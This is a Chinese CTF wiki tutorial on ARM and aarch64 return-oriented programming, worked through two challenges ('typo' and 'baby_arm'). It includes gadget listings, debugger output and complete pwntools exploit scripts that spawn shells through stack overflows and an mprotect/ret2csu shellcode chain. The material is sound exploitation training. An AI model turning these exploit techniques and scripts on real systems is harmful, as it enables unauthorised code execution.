arm - ROP¶
介绍¶
因为目前为止,arm, mips 等架构出现的 pwn 还是较简单的栈漏洞,因此目前只打算介绍 arm 下的 rop,其他漏洞的利用以后会逐渐介绍
预备知识¶
先看一下 arm 下的函数调用约定,函数的第 1 ~ 4 个参数分别保存在 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡,函数的返回值保存在 r0 中
除此之外,arm 的 b/bl 等指令实现跳转; pc 寄存器相当于 x86 的 eip,保存下一条指令的地址,也是我们要控制的目标
jarvisoj - typo¶
这里以 jarvisoj 的 typo 一题为例进行展示,题目可以在 ctf-challenge 下载
确定保护¶
jarvisOJ_typo [master●●] check ./typo typo: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=211877f58b5a0e8774b8a3a72c83890f8cd38e63, stripped [*] '/home/m4x/pwn_repo/jarvisOJ_typo/typo' Arch: arm-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8000)
利用思路¶
因此需要我们找一个溢出点,先运行一下程序,因为是静态链接的,所以在环境配置好的情况下直接运行即可
jarvisOJ_typo [master●●] ./typo Let's Do Some Typing Exercise~ Press Enter to get start; Input ~ if you want to quit ------Begin------ throng throng survive aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa qemu: uncaught target signal 11 (Segmentation fault) - core dumped [1] 1172 segmentation fault ./typo
程序的输入点不多,很容易就能找到溢出点
构造 ROP¶
因此思路就很明显了,利用栈溢出构造 system("/bin/sh"), 先找一下 gadgets
jarvisOJ_typo [master●●] ROPgadget --binary ./typo --only "pop" Gadgets information ============================================================ 0x00020904 : pop {r0, r4, pc} 0x00068bec : pop {r1, pc} 0x00008160 : pop {r3, pc} 0x0000ab0c : pop {r3, r4, r5, pc} 0x0000a958 : pop {r3, r4, r5, r6, r7, pc} 0x00014a70 : pop {r3, r4, r7, pc} 0x000083b0 : pop {r4, pc} 0x00009284 : pop {r4, r5, pc} 0x000095b8 : pop {r4, r5, r6, pc} 0x000082e8 : pop {r4, r5, r6, r7, pc} 0x00023ed4 : pop {r4, r5, r7, pc} 0x00023dbc : pop {r4, r7, pc} 0x00014068 : pop {r7, pc} Unique gadgets found: 13
我们只需要控制第一个参数,因此可以选择 pop {r0, r4, pc}
这条 gadgets, 来构造如下的栈结构
+-------------+ | | | padding | +-------------+ | padding | <- frame pointer +-------------+ |gadgets_addr | <- return address +-------------+ |binsh_addr | +-------------+ |junk_data | +-------------+ |system_addr | +-------------+
这时还需要 padding 的长度和 system 以及 /bin/sh 的地址, /bin/sh 的地址用 ROPgadget 就可以找到
jarvisOJ_typo [master●●] ROPgadget --binary ./typo --string /bin/sh Strings information ============================================================ 0x0006cb70 : /bin/sh
pwndbg> cyclic 200 aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab pwndbg> c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x62616164 in ?? () LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ──────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────── R0 0x0 R1 0xfffef024 ◂— 0x61616161 ('aaaa') R2 0x7e R3 0x0 R4 0x62616162 ('baab') R5 0x0 R6 0x0 R7 0x0 R8 0x0 R9 0xa5ec ◂— push {r3, r4, r5, r6, r7, r8, sb, lr} R10 0xa68c ◂— push {r3, r4, r5, lr} R11 0x62616163 ('caab') R12 0x0 SP 0xfffef098 ◂— 0x62616165 ('eaab') PC 0x62616164 ('daab') ───────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────── Invalid address 0x62616164 ────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────── 00:0000│ sp 0xfffef098 ◂— 0x62616165 ('eaab') 01:0004│ 0xfffef09c ◂— 0x62616166 ('faab') 02:0008│ 0xfffef0a0 ◂— 0x62616167 ('gaab') 03:000c│ 0xfffef0a4 ◂— 0x62616168 ('haab') 04:0010│ 0xfffef0a8 ◂— 0x62616169 ('iaab') 05:0014│ 0xfffef0ac ◂— 0x6261616a ('jaab') 06:0018│ 0xfffef0b0 ◂— 0x6261616b ('kaab') 07:001c│ 0xfffef0b4 ◂— 0x6261616c ('laab') Program received signal SIGSEGV pwndbg> cyclic -l 0x62616164 112
或者可以更暴力一点直接爆破栈溢出的长度
至于 system 的地址,因为这个 binary 被去除了符号表,我们可以先用 rizzo
来恢复部分符号表(关于恢复符号表暂时可以先看参考链接,以后会逐渐介绍)。虽然 rizzo 在这个 binary 上恢复的效果不好,但很幸运,在识别出来的几个函数中刚好有 system
char *__fastcall system(int a1) { char *result; // r0 if ( a1 ) result = sub_10BA8(a1); else result = (char *)(sub_10BA8((int)"exit 0") == 0); return result; }
或者可以通过搜索 /bin/sh 字符串来寻找 system 函数
exp¶
所有的条件都有了,构造 system("/bin/sh") 即可
jarvisOJ_typo [master●●] cat solve.py #!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * import sys import pdb # context.log_level = "debug" # for i in range(100, 150)[::-1]: for i in range(112, 123): if sys.argv[1] == "l": io = process("./typo", timeout = 2) elif sys.argv[1] == "d": io = process(["qemu-arm", "-g", "1234", "./typo"]) else: io = remote("pwn2.jarvisoj.com", 9888, timeout = 2) io.sendafter("quit\n", "\n") io.recvline() ''' jarvisOJ_typo [master●●] ROPgadget --binary ./typo --string /bin/sh Strings information ============================================================ 0x0006c384 : /bin/sh jarvisOJ_typo [master●●] ROPgadget --binary ./typo --only "pop|ret" | grep r0 0x00020904 : pop {r0, r4, pc} ''' payload = 'a' * i + p32(0x20904) + p32(0x6c384) * 2 + p32(0x110B4) success(i) io.sendlineafter("\n", payload) # pause() try: # pdb.set_trace() io.sendline("echo aaaa") io.recvuntil("aaaa", timeout = 1) except EOFError: io.close() continue else: io.interactive()
2018 上海市大学生网络安全大赛 - baby_arm¶
静态分析¶
题目给了一个 aarch64
架构的文件,没有开 canary 保护
Shanghai2018_baby_arm [master] check ./pwn + file ./pwn ./pwn: ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-aarch64.so.1, for GNU/Linux 3.7.0, BuildID[sha1]=e988eaee79fd41139699d813eac0c375dbddba43, stripped + checksec ./pwn [*] '/home/m4x/pwn_repo/Shanghai2018_baby_arm/pwn' Arch: aarch64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
__int64 main_logic() { Init(); write(1LL, "Name:", 5LL); read(0LL, input, 512LL); sub_4007F0(); return 0LL; } void sub_4007F0() { __int64 v0; // [xsp+10h] [xbp+10h] read(0LL, &v0, 512LL); }
sub_4007F0()
中,又读取了 512 个字节到栈上,需要注意的是这里直接从 frame pointer + 0x10
开始读取,因此即使开了 canary 保护也无所谓。
思路¶
理一下思路,可以直接 rop,但我们不知道远程的 libc 版本,同时也发现程序中有调用 mprotect
的代码段
.text:00000000004007C8 STP X29, X30, [SP,#-0x10]! .text:00000000004007CC MOV X29, SP .text:00000000004007D0 MOV W2, #0 .text:00000000004007D4 MOV X1, #0x1000 .text:00000000004007D8 MOV X0, #0x1000 .text:00000000004007DC MOVK X0, #0x41,LSL#16 .text:00000000004007E0 BL .mprotect .text:00000000004007E4 NOP .text:00000000004007E8 LDP X29, X30, [SP],#0x10 .text:00000000004007EC RET
mprotect
的权限位设成了 0,没有可执行权限,这就需要我们通过 rop 控制 mprotect
设置如 bss 段等的权限为可写可执行
因此可以有如下思路:
- 第一次输入 name 时,在 bss 段写上 shellcode
- 通过 rop 调用 mprotect 改变 bss 的权限
- 返回到 bss 上的 shellcode
mprotect
需要控制三个参数,可以考虑使用 ret2csu 这种方法,可以找到如下的 gadgets 来控制 x0, x1, x2
寄存器
.text:00000000004008AC LDR X3, [X21,X19,LSL#3] .text:00000000004008B0 MOV X2, X22 .text:00000000004008B4 MOV X1, X23 .text:00000000004008B8 MOV W0, W24 .text:00000000004008BC ADD X19, X19, #1 .text:00000000004008C0 BLR X3 .text:00000000004008C4 CMP X19, X20 .text:00000000004008C8 B.NE loc_4008AC .text:00000000004008CC .text:00000000004008CC loc_4008CC ; CODE XREF: sub_400868+3C↑j .text:00000000004008CC LDP X19, X20, [SP,#var_s10] .text:00000000004008D0 LDP X21, X22, [SP,#var_s20] .text:00000000004008D4 LDP X23, X24, [SP,#var_s30] .text:00000000004008D8 LDP X29, X30, [SP+var_s0],#0x40 .text:00000000004008DC RET
最终的 exp 如下:
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * import sys context.binary = "./pwn" context.log_level = "debug" if sys.argv[1] == "l": io = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "./pwn"]) elif sys.argv[1] == "d": io = process(["qemu-aarch64", "-g", "1234", "-L", "/usr/aarch64-linux-gnu", "./pwn"]) else: io = remote("106.75.126.171", 33865) def csu_rop(call, x0, x1, x2): payload = flat(0x4008CC, '00000000', 0x4008ac, 0, 1, call) payload += flat(x2, x1, x0) payload += '22222222' return payload if __name__ == "__main__": elf = ELF("./pwn", checksec = False) padding = asm('mov x0, x0') sc = asm(shellcraft.execve("/bin/sh")) # print disasm(padding * 0x10 + sc) io.sendafter("Name:", padding * 0x10 + sc) sleep(0.01) # io.send(cyclic(length = 500, n = 8)) # rop = flat() payload = flat(cyclic(72), csu_rop(elf.got['read'], 0, elf.got['__gmon_start__'], 8)) payload += flat(0x400824) io.send(payload) sleep(0.01) io.send(flat(elf.plt['mprotect'])) sleep(0.01) raw_input("DEBUG: ") io.sendafter("Name:", padding * 0x10 + sc) sleep(0.01) payload = flat(cyclic(72), csu_rop(elf.got['__gmon_start__'], 0x411000, 0x1000, 7)) payload += flat(0x411068) sleep(0.01) io.send(payload) io.interactive()
notice¶
同时需要注意的是,checksec
检测的结果是开了 nx 保护,但这样检测的结果不一定准确,因为程序的 nx 保护也可以通过 qemu 启动时的参数 -nx
来决定(比如这道题目就可以通过远程失败时的报错发现程序开了 nx 保护),老版的 qemu 可能没有这个参数。
Desktop ./qemu-aarch64 --version qemu-aarch64 version 2.7.0, Copyright (c) 2003-2016 Fabrice Bellard and the QEMU Project developers Desktop ./qemu-aarch64 -h| grep nx -nx QEMU_NX enable NX implementation
如果有如下的报错,说明没有 aarch64 的汇编器
[ERROR] Could not find 'as' installed for ContextType(arch = 'aarch64', binary = ELF('/home/m4x/Projects/ctf-challenges/pwn/arm/Shanghai2018_baby_arm/pwn'), bits = 64, endian = 'little', log_level = 10) Try installing binutils for this architecture: https://docs.pwntools.com/en/stable/install/binutils.html
Shanghai2018_baby_arm [master●] apt search binutils| grep aarch64 p binutils-aarch64-linux-gnu - GNU binary utilities, for aarch64-linux-gnu target p binutils-aarch64-linux-gnu:i386 - GNU binary utilities, for aarch64-linux-gnu target p binutils-aarch64-linux-gnu-dbg - GNU binary utilities, for aarch64-linux-gnu target (debug symbols) p binutils-aarch64-linux-gnu-dbg:i386 - GNU binary utilities, for aarch64-linux-gnu target (debug symbols) Shanghai2018_baby_arm [master●] sudo apt install bintuils-aarch64-linux-gnu
aarch64 的文件在装 libc 时是
arm64
,在装binutils
时是aarch64
例题¶
Codegate2015 - melong
参考文献¶
http://www.freebuf.com/articles/terminal/134980.html